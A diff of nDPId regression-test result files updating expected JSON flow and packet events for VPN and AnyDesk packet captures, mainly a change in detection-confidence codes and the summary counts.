00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687262866,"flow_last_seen":1569687262912,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":366,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"162.222.43.153","src_port":56881,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":3001,"packets-processed":2997,"total-skipped-flows":0,"total-l4-payload-len":880499,"total-not-detected-flows":3,"total-guessed-flows":6,"total-detected-flows":60,"total-detection-updates":33,"total-updates":0,"current-active-flows":0,"total-active-flows":69,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":398,"global_ts_msec":1569687289262} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267812,"flow_last_seen":1569687267847,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":82,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51990,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687267991,"flow_last_seen":1569687267991,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"239.255.255.250","src_port":61328,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245321,"flow_last_seen":1569687245366,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":62322,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687268376,"flow_last_seen":1569687268376,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.151","dst_ip":"10.0.0.227","src_port":1900,"dst_port":61328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267814,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267481,"flow_last_seen":1569687267500,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":62427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} +00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242476,"flow_last_seen":1569687242476,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.255.250","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687242271,"flow_last_seen":1569687242271,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"239.255.3.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00576{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":3001,"packets-processed":2997,"total-skipped-flows":0,"total-l4-payload-len":880499,"total-not-detected-flows":2,"total-guessed-flows":6,"total-detected-flows":61,"total-detection-updates":34,"total-updates":0,"current-active-flows":0,"total-active-flows":69,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":399,"global_ts_msec":1569687289262} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3001/2997 ~~ skipped flows.............: 0 ~~ total layer4 data length..: 880499 bytes -~~ total detected protocols..: 60 +~~ total detected protocols..: 61 ~~ total active/idle flows...: 69/69 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6093183 bytes -~~ total memory freed........: 6093183 bytes -~~ total allocations/frees...: 121443/121443 +~~ total memory allocated....: 6226828 bytes +~~ total memory freed........: 6226828 bytes +~~ total allocations/frees...: 124206/124206 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 451 chars ~~ json string max len.......: 1592 chars diff --git a/test/results/anydesk-2.pcap.out b/test/results/anydesk-2.pcap.out index 9b0349eb1..7b2ac4cc3 100644 --- a/test/results/anydesk-2.pcap.out +++ b/test/results/anydesk-2.pcap.out @@ -2,30 +2,30 @@ 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1613977585247} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1613977585247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1613977585247,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C0AAIARAADAqAG7wKgBAeh3ADUAOIRW7CIBAAABAAAAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQAB"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585247,"flow_last_seen":1613977585247,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585247,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1613977585260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585260,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcjnRAADkRLxDAqAEBwKgBuwA16HcASAAA7CKBgAABAAEAAAAADnJlbGF5LTMxODVhODQ3A25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAADSNAAEJT3fDw=="} -00809{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}} +00809{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585247,"flow_last_seen":1613977585260,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585260,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":59511,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-3185a847.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"37.61.223.15"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1613977585542,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1613977585542,"pkt":"EBMx8Tl22MuK4S0uCABFAABM5C4AAIARAADAqAG7wKgBAdhQADUAOIRW6okBAAABAAAAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQAB"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977585542,"flow_last_seen":1613977585542,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1613977585542,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00523{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1613977585553,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1613977585553,"pkt":"2MuK4S0uEBMx8Tl2CABFAABcBhBAADkRt3TAqAEBwKgBuwA12FAASAAA6omBgAABAAEAAAAADnJlbGF5LTliNjgyN2YyA25ldAdhbnlkZXNrA2NvbQAAAQABwAwAAQABAABtXAAEisckcw=="} -00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} +00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1613977585542,"flow_last_seen":1613977585553,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1613977585553,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.1","src_port":55376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AnyDesk","breed":"Acceptable","category":"RemoteAccess"},"dns": {"query":"relay-9b6827f2.net.anydesk.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"138.199.36.115"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1613977595379,"flow_last_seen":1613977595379,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1613977595379,"l3_proto":"ip4","src_ip":"192.168.1.187","dst_ip":"192.168.1.178","src_port":54164,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1613977595379,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595379,"pkt":"KDc3AG3I2MuK4S0uCABFAAA0dDNAAIAGAADAqAG7wKgBstOUG56PGHtIAAAAAIAC+vCE5AAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1613977595380,"pkt":"2MuK4S0uKDc3AG3ICABFAAA0AABAAEAGtgbAqAGywKgBuxue05RZw\/OWjxh7SYAS\/\/+kVwAAAgQFtAEDAwUEAgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anydesk-2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1613977595380,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1613977595380,"pkt":"KDc3AG3I2MuK4S0uCABFAAAodDRAAIAGAADAqAG7wKgBstOUG56PGHtJWcPzl1AQBAKE2AAA"} 